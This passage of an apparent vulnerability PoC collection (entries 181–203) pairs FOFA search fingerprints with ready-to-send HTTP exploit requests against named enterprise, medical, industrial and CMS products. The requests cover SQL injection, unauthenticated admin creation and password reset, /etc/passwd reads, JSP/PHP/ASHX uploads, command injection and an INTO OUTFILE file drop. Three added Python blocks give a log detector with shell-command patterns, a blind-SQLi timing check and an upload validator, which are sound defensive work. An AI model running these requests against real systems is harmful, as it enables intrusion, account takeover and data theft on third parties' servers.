Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus 网关 AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
The poi parameter is fetched server-side as a URL, so a file:// URL returns local files.
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (Esafenet) electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The name parameter supplies the stored file's extension (.ashx) and the raw request body becomes its content; the handler below writes "test" when the stored file is requested.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Three requests: obtain a CSRF token under a fixed PHPSESSID, submit the injected param value, then read the file the command wrote.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星 (Volans) internet access behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
No authentication is sent; xgh is the account identifier and newPass the password to set.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
The sid value URL-decodes to `ls />/www/aaa.txt` wrapped in backticks, so the command runs through shell substitution and its output lands under the web root; the request carries an authenticated LuCI sysauth cookie.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

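Detection for the command-injection, file-read and webshell-drop probes listed in entries 188, 190, 193, 195 and 198 and in the /index.php?s=/Admin/appsave request at the top of this section, as an added example that is not part of the original post and not code from any vendor named here. It decodes each request the way the vulnerable handlers would (URL-decoding, form or JSON parsing, then MySQL unhex()) and runs the indicators over individual parameters rather than the raw query, where & and ; are legitimate separators. The sample records are constructed from the requests above; their layout (method, path with query, body) is an assumption about what a reverse proxy or WAF logs, and the indicator names and command list are mine.

```python
"""Flag the listed command-injection / file-read / INTO OUTFILE probes in request logs.

Added example; not code from the original post or from any product named there.
Record layout and sample records are constructed for this example.
"""
import json
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators run over each decoded parameter. The command list is an assumption;
# extend it for your environment.
SHELL_CMD = r"(?:uname|id|whoami|cat|ls|echo|wget|curl|sh|bash|nc|python\d?)"
INDICATORS = [
    ("shell-metachar", re.compile(r"`|\$\(|[;|&]\s*" + SHELL_CMD + r"\b")),
    ("python-os-system", re.compile(r"\bos\.(?:system|popen)\s*\(|\bsubprocess\.")),
    ("local-file", re.compile(r"file:///|[/\\]etc/(?:passwd|shadow)\b")),
    ("sql-outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.IGNORECASE)),
]
UNHEX_RE = re.compile(r"unhex\(\s*'([0-9a-fA-F]+)'\s*\)", re.IGNORECASE)
WEBSHELL_RE = re.compile(r"<\?php|<%")

# Hex literal from the appsave request above (decodes to a PHP one-liner).
APPSAVE_HEX = ("3c3f706870206563686f206d643528223122293b202466696c65203d20"
               "5f5f46494c455f5f3b20756e6c696e6b282466696c65293b")


def decode_unhex(text: str) -> list:
    """Decode every MySQL unhex('...') literal found in text."""
    out = []
    for hexstr in UNHEX_RE.findall(text):
        if len(hexstr) % 2 == 0:
            out.append(bytes.fromhex(hexstr).decode("utf-8", "replace"))
    return out


def _strings(text: str):
    """Yield decoded keys and values from a query string, a form body or a JSON body."""
    if not text:
        return
    obj = None
    if text.lstrip().startswith(("{", "[")):
        try:
            obj = json.loads(text)
        except ValueError:
            obj = None
    if obj is not None:
        stack = [obj]
        while stack:
            item = stack.pop()
            if isinstance(item, dict):
                stack.extend(item.values())
            elif isinstance(item, list):
                stack.extend(item)
            elif isinstance(item, str):
                yield item
        return
    pairs = parse_qsl(text, keep_blank_values=True)
    for key, value in pairs:
        yield key
        yield value
    if not pairs:
        yield unquote_plus(text)


def inspect(record: dict) -> list:
    """Return the sorted indicator names that match one logged request."""
    hits = set()
    fields = list(_strings(urlsplit(record["path"]).query)) + list(_strings(record.get("body", "")))
    for field in fields:
        for name, pattern in INDICATORS:
            if pattern.search(field):
                hits.add(name)
        if any(WEBSHELL_RE.search(decoded) for decoded in decode_unhex(field)):
            hits.add("webshell-in-unhex")
    return sorted(hits)


# Constructed records modelled on the requests above, plus one benign request.
SAMPLE_RECORDS = [
    {"id": "appsave", "method": "GET", "body": "",
     "path": "/index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%27" + APPSAVE_HEX
             + "%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23"},
    {"id": "188", "method": "GET", "path": "/attachment?file=/etc/passwd", "body": ""},
    {"id": "190", "method": "POST", "path": "/index.php/admin/Userinfo/poihuoqu", "body": "poi=file:///etc/passwd"},
    {"id": "193", "method": "POST", "path": "/master/ajaxActions/setSystemTimeAction.php?token_csrf=x",
     "body": "param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')"},
    {"id": "195", "method": "POST", "path": "/send_order.cgi?parameter=operation",
     "body": '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'},
    {"id": "198", "method": "GET", "body": "",
     "path": "/cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20"},
    {"id": "benign", "method": "GET", "path": "/index.php?s=/Home/index&page=2", "body": ""},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(f"{rec['id']:8} {rec['method']:4} {inspect(rec)}")
```

Run it on a JSON export of proxy or WAF logs by mapping each record to the same three keys; the unhex() step matters because the dropped file never appears in plaintext in the request.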

199. Cockpit CMS assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Send the request below to fetch the CSRF token; then obtain a session cookie, upload the file and request it to confirm:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with the header:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with that session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The injection point is the TableName parameter; decoded, it reads DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

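A baseline-aware verification of the time-based blind injections in entries 186, 187, 189, 191, 200 and 201, as an added example that is not part of the original post and not any vendor's code. Comparing one payload response against a fixed 5-second threshold misfires on slow or busy targets, and it does not fit the DataCube3 payload at all, whose delay comes from hashing a large RANDOMBLOB rather than from sleep(). The check below measures a benign baseline, interleaves benign and payload rounds, and requires every payload round to beat the baseline by a margin. VirtualClock and make_simulated_target are stand-ins (assumptions) so the file runs offline; the two payload builders only reproduce the shapes quoted above.

```python
"""Time-based blind SQL injection check measured against a benign baseline.

Added example; not code from the original post or from any product named there.
The clock and the target are simulated so the file runs offline.
"""
import re
import statistics
from typing import Callable, Sequence


class VirtualClock:
    """Clock that advances only when sleep() is called. For a live check use
    time.monotonic and time.sleep instead; this stand-in keeps the example offline."""

    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now

    def sleep(self, seconds: float) -> None:
        self.now += seconds


def mysql_payload(delay: int) -> str:
    """Shape of the SeaCMS payload above (MySQL sleep())."""
    return f"(select(0)from(select(sleep({delay})))v)"


def mssql_payload(delay: int) -> str:
    """Shape of the LANWON / 亿赛通 / 方正 payloads above (SQL Server WAITFOR DELAY)."""
    return f"1';WAITFOR DELAY '0:0:{delay}'--"


def timed_request(send: Callable[[str], None], value: str, clock: Callable[[], float]) -> float:
    start = clock()
    send(value)
    return clock() - start


def is_time_blind_injectable(send: Callable[[str], None], benign: str, payload: str,
                             clock: Callable[[], float], delay: int = 5,
                             rounds: int = 3, margin: float = 0.6) -> bool:
    """True only if every payload round is slower than the benign median by at least
    margin*delay seconds. Interleaving the rounds means a single latency spike on
    the target cannot account for the whole difference."""
    benign_times, payload_times = [], []
    for _ in range(rounds):
        benign_times.append(timed_request(send, benign, clock))
        payload_times.append(timed_request(send, payload, clock))
    baseline = statistics.median(benign_times)
    return all(t - baseline >= margin * delay for t in payload_times)


def make_simulated_target(clock: VirtualClock, vulnerable: bool,
                          latencies: Sequence[float] = (0.3, 1.2, 0.4, 0.9, 0.5, 0.6)) -> Callable[[str], None]:
    """Constructed stand-in for an endpoint (hypothetical; not any product above).
    `latencies` are per-request processing times, cycled in order. When `vulnerable`
    is True the injected sleep()/WAITFOR value is honoured, as the real targets do."""
    delay_re = re.compile(r"sleep\((\d+)\)|WAITFOR DELAY '0:0:(\d+)'", re.IGNORECASE)
    counter = {"n": 0}

    def send(value: str) -> None:
        clock.sleep(latencies[counter["n"] % len(latencies)])
        counter["n"] += 1
        match = delay_re.search(value)
        if vulnerable and match:
            clock.sleep(float(match.group(1) or match.group(2)))

    return send


if __name__ == "__main__":
    clock = VirtualClock()
    for vuln in (True, False):
        target = make_simulated_target(clock, vulnerable=vuln)
        verdict = is_time_blind_injectable(target, "1", mssql_payload(5), clock)
        print("vulnerable" if vuln else "patched", "->", verdict)
```

For a live check, replace the clock with time.monotonic plus time.sleep and `send` with the HTTP request from the relevant entry. For the RANDOMBLOB payload the delay is CPU-bound and not fixed, so set `delay` and `margin` from a benign measurement of that target rather than assuming 5 seconds, and expect the check to load the database while it runs.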
202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
First obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then replace __VIEWSTATE and __EVENTVALIDATION below with the values obtained:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

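Server-side validation that would have stopped the uploads in entries 192, 194, 199, 202 and 203, as an added example that is not code from the original post or from any of those products. Each of those handlers trusts something the client controls: the filename (traversal into fe.war, a .jsp/.php extension, an extension chosen through the name parameter) or the declared Content-Type (image/jpeg wrapped around a JSP). The allow-list, the signature table and the assumption that the form accepts images are mine; check_upload is a non-raising wrapper used to run the constructed cases below.

```python
"""Upload validation: reject traversal, executable extensions and mislabelled content.

Added example; not code from the original post or from any product named there.
Allow-list, signatures and the image-form assumption are the example's own.
"""
import re
import secrets

# Permitted extensions, the Content-Type each must declare, and the signature the
# body must start with (assumption: an image-upload form).
ALLOWED_TYPES = {
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}
# Server-side executable extensions, rejected anywhere after the first dot so that
# shell.php.jpg and shell.jpg.php are both refused.
EXECUTABLE_EXT = {"php", "php3", "php5", "phtml", "phar", "jsp", "jspx", "jsw", "jsv",
                  "asp", "aspx", "asa", "ashx", "asmx", "cer", "cgi", "pl", "sh", "war", "htaccess"}
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,127}$")


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, declared_type: str, head: bytes) -> str:
    """Validate one upload and return the server-chosen storage name.

    Raises UploadRejected naming the failed check. `head` is the first bytes of the
    body (16 is enough for the signatures above)."""
    if not filename or "/" in filename or "\\" in filename or ".." in filename:
        raise UploadRejected("path separators or traversal in filename")
    if not SAFE_NAME_RE.match(filename):
        raise UploadRejected("filename contains characters outside the safe set")
    parts = filename.lower().split(".")
    if len(parts) < 2:
        raise UploadRejected("no extension")
    if any(part in EXECUTABLE_EXT for part in parts[1:]):
        raise UploadRejected("executable extension")
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} not in allow-list")
    expected_type, signatures = ALLOWED_TYPES[ext]
    if declared_type.split(";")[0].strip().lower() != expected_type:
        raise UploadRejected("declared Content-Type does not match extension")
    if not any(head.startswith(sig) for sig in signatures):
        raise UploadRejected("file content does not match extension")
    # Never store under the client's name: a random server-chosen name defeats
    # overwrites and path guessing such as /storage/uploads/tttt.php above.
    return f"{secrets.token_hex(16)}.{ext}"


def check_upload(filename: str, declared_type: str, head: bytes) -> tuple:
    """Non-raising wrapper: (accepted, storage name or rejection reason)."""
    try:
        return True, validate_upload(filename, declared_type, head)
    except UploadRejected as exc:
        return False, str(exc)


# Constructed cases mirroring the upload POCs above, plus one legitimate JPEG.
CASES = [
    ("../../../../../jboss/web/fe.war/hello.jsp", "text/plain", b'<% out.println("hello");%>'),
    (".ashx", "application/x-www-form-urlencoded", b"<%@ WebHandler"),
    ("tttt.php", "text/php", b'<?php echo "tttt";'),
    ("11.jsp", "image/jpeg", b'<% out.print("hello,eHR");%>'),
    ("1123.txt", "text/plain", b"Hello World!"),
    ("shell.jpg.php", "image/jpeg", b"\xff\xd8\xff\xe0"),
    ("11.jpg", "image/jpeg", b"<% out.print(1); %>"),
    ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"),
]

if __name__ == "__main__":
    for name, ctype, head in CASES:
        ok, detail = check_upload(name, ctype, head)
        print(f"{name!r:45} {'ACCEPT' if ok else 'REJECT'} {detail}")
```

The order of the checks matters for the error a client sees but not for safety: every case from the entries above fails at least one check, and the accepted file is stored under a name the client never chose.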